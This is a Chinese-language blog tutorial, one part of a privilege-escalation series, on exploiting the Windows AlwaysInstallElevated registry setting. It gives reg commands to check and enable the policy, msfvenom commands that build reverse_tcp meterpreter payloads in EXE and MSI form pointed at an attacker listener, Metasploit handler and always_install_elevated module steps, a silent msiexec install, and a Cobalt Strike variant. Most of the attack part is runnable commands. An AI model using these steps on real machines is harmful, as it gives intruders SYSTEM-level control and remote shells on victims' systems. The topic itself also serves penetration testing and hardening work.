操作系统权限提升(八)之系统错误配置-注册表键AlwaysInstall提权

系列文章

操作系统权限提升(一)之操作系统权限介绍
操作系统权限提升(二)之常见提权的环境介绍
操作系统权限提升(三)之Windows系统内核溢出漏洞提权
操作系统权限提升(四)之系统错误配置-Tusted Service Paths提权
操作系统权限提升(五)之系统错误配置-PATH环境变量提权
操作系统权限提升(六)之系统错误配置-不安全的服务提权
操作系统权限提升(七)之系统错误配置-不安全注册表提权

注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!!

注册表键AlwaysInstall提权

注册表键AlwaysInstall提权原理

注册表键AlwaysInstallElevated是一个策略设置项。windows允许低权限用户以System权限运行安装文件。如果启用此策略设置项,那么任何权限用户都能以NT AUTHORITY\SYSTEM权限来安装恶意的MSI(Microsoft Windows Installer)文件。

提权环境

查看Windows installer特权功能是否已启用

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

在这里插入图片描述

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

在这里插入图片描述

运行"中输入gpedit.msc,打开组策略管理器

计算机配置–>管理模板–>Windows 组件–>Windows Installer

在这里插入图片描述
将"永远以高特权进行安装"编辑,选择开启

在这里插入图片描述
同样在用户配置中也需要进行配置

在这里插入图片描述
还要设置普通程序的安装可行性

在这里插入图片描述

此时再去查询注册表中的内容

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

在这里插入图片描述

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

在这里插入图片描述

也可以用以下的命令修改

reg add HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1 /f

在这里插入图片描述

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1 /f

在这里插入图片描述

注册表键AlwaysInstall提权实战

MSF提权

首先拿到MSF的会话

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=4567 -f exe -o payload.exe //生成木马

在这里插入图片描述

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.106
set lport 4567
exploit

在这里插入图片描述
查询当前的权限是apache

getuid

在这里插入图片描述
使用提权模块

use exploit/windows/local/always_install_elevated

在这里插入图片描述
在这里插入图片描述
设置session后直接run就可以了,可能会失败哦。

在这里插入图片描述如果失败了我们可以使用MSF生成 msi文件然后上传上去运行即可

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=6789 -f msi -o payload.msi //生成msi文件

建立一个新的监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.106
set lport 6789
exploit

将msi文件通过shell传上去

在这里插入图片描述运行msi文件就可以了

execute "msiexec.exe /quiet /qn /i payload.msi"

在这里插入图片描述得到新的shell提权成功

在这里插入图片描述

利用CS提权

先拿到cs的shell

在这里插入图片描述查看Windows installer特权功能是否已启用

shell reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

在这里插入图片描述

shell reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

在这里插入图片描述

利用CS生成exe文件,然后使用exe2msi工具制作 将exe文件转换成MSI文件

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
然后把msi文件上传到目标机器上去执行

在这里插入图片描述
运行即可,提权成功

msiexec.exe /quiet /qn /i 1.msi

在这里插入图片描述

posted @ 2023-02-02 15:54  私ははいしゃ敗者です  阅读(90)  评论(0编辑  收藏  举报  来源